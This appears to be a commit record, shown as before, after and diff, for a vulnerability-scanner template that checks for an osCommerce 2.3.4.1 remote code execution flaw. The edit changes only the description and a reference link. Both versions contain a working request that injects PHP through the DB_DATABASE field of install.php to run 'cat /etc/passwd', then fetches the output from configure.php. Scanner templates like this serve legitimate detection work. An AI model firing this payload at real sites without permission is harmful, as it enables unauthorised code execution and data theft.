vulnerabilities/oscommerce/oscommerce-rce.yaml (before)
id: oscommerce-rce

info:
  name: osCommerce 2.3.4.1 - Remote Code Execution
  author: Suman_Kar
  severity: high
  description: A vulnerability in osCommerce's install.php allows remote unauthenticated attackers to injecting PHP code into the db_database parameter, and subsequently use the configure.php page to to read the
    command's executed output
  reference:
    - https://www.exploit-db.com/exploits/50128
  tags: rce,oscommerce,edb

requests:
  - raw:
      - |
        POST /install/install.php?step=4 HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        DIR_FS_DOCUMENT_ROOT=.%2F&DB_DATABASE=%27%29%3Bpassthru%28%27cat+%2Fetc%2Fpasswd%27%29%3B%2F%2A

      - |
        GET /install/includes/configure.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body

      - type: status
        status:
          - 200

vulnerabilities/oscommerce/oscommerce-rce.yaml (after)
id: oscommerce-rce

info:
  name: osCommerce 2.3.4.1 - Remote Code Execution
  author: Suman_Kar
  severity: high
  description: osCommerce 2.3.4.1 is susceptible to remote code execution via install.php. A remote attacker can inject PHP code into the db_database parameter and subsequently use the configure.php page to to read the command's executed output.
  reference:
    - https://www.exploit-db.com/exploits/50128
    - https://github.com/nobodyatall648/osCommerce-2.3.4-Remote-Command-Execution
  tags: rce,oscommerce,edb

requests:
  - raw:
      - |
        POST /install/install.php?step=4 HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        DIR_FS_DOCUMENT_ROOT=.%2F&DB_DATABASE=%27%29%3Bpassthru%28%27cat+%2Fetc%2Fpasswd%27%29%3B%2F%2A

      - |
        GET /install/includes/configure.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body

      - type: status
        status:
          - 200

# Enhanced by md on 2022/10/04

vulnerabilities/oscommerce/oscommerce-rce.yaml (diff)
@@ -4,10 +4,10 @@ info:
   name: osCommerce 2.3.4.1 - Remote Code Execution
   author: Suman_Kar
   severity: high
-  description: A vulnerability in osCommerce's install.php allows remote unauthenticated attackers to injecting PHP code into the db_database parameter, and subsequently use the configure.php page to to read the
-    command's executed output
+  description: osCommerce 2.3.4.1 is susceptible to remote code execution via install.php. A remote attacker can inject PHP code into the db_database parameter and subsequently use the configure.php page to to read the command's executed output.
   reference:
     - https://www.exploit-db.com/exploits/50128
+    - https://github.com/nobodyatall648/osCommerce-2.3.4-Remote-Command-Execution
   tags: rce,oscommerce,edb
 
 requests:
@@ -35,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by md on 2022/10/04
